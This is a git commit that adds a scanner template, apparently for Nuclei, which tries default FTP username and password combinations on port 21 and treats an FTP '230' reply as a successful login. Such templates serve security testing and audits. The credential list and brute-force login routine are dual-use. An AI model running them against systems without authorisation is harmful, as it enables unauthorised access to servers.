FTP default credentials

patch-1
pussycat0x 2021-07-07 00:27:34 +05:30 committed by GitHub
parent 9bec8f0b56
commit 591e8a7d60
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: ftp-default-credentials
info:
name: ftp service default credentials
author: pussycat0x
severity: critical
tags: network,ftp,default_credentials
network:
- payloads:
username:
- admin
- root
- anonymous
password:
- anonymous
- password
- toor
- nas
- guest
- default
- pass1
- stingray
attack: clusterbomb
inputs:
- data: "USER {{username}}\r\nPASS {{password}}\r\n"
host:
- "{{Hostname}}:21"
matchers:
- type: word
words:
- "230"